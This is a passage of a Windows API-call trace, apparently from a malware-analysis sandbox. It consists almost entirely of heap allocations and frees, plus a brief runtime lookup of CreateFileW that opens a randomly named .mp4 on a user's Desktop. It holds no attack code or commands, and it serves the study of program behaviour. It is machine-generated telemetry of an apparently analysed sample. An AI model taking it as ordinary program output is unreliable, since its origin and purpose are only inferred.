(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0119.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0119.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0119.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0119.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0119.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0119.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0119.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0119.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0119.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0119.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0119.791] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0119.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0119.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0119.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0119.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0119.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0119.794] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0119.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0119.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0119.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0119.794] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0119.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0119.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0119.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0119.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0119.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0119.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0119.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0119.795] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\9irmcppbnuygc4yelr9w.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0119.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0119.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0119.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0119.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0119.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0119.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0119.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0119.797] FreeLibrary (hLibModule=0x772d0000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0119.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.799] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0119.799] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: 